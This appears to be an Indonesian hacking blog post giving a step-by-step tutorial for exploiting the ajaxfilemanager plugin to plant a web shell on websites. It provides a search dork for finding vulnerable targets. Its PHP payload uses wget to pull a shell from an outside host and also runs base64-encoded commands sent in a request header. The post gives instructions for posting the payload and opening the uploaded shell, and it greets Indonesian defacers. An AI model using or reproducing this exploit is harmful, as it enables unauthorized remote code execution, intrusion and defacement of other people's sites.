ajax file manager remote code execution exploit

Sore gini disekolah ga ada guru mending ngeblog :D
kali ini tutor upload shell > ajaxfilemanager Remote file upload

bahan?
  1. Dork:
 inurl:/plugins/ajaxfilemanager/
  1. exploit: 
foo=<?php error_reporting(0);print(system('wget http://wallpaper-hd.org/shell.txt -O jkt48.php'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>


Tutor?
  • Cari Target dengan dork  
  • Disini gw dah ada target
  •  cek webnya vuln atu nggak, caranya buka /ajaxfilemanager/ajax_create_folder.php
  • nah kalo begini mungkin vuln
  • Kalo ajax_create_folder.php udah vuln > lanjut cek /ajaxfilemanager/inc/data.php . kalo begini ini site 80 persen vuln, kalo ga vuln biasanya forbidden
  • langsung buka ajax_create_folder.php > lalu kita pake hack bar buat post data..
  • masukin link patch ajax_create_folder.php > lalu isi post data dengan exploit > klick execute
  • kalo udah tinggal kita buka /inc/data.php tadi > kalo berubah jadi begitu.. file success ke upload..
  • patch shell /ajaxplorer/filemanager/inc/nama shell.php


Tutorial video disini

 Sekian tutornya :D salam dari saya unnamed48
Thanks to res7ock crew | my friends | all indonesian defacer |
Salam buat oshi gw shani :D



Post a Comment

0 Comments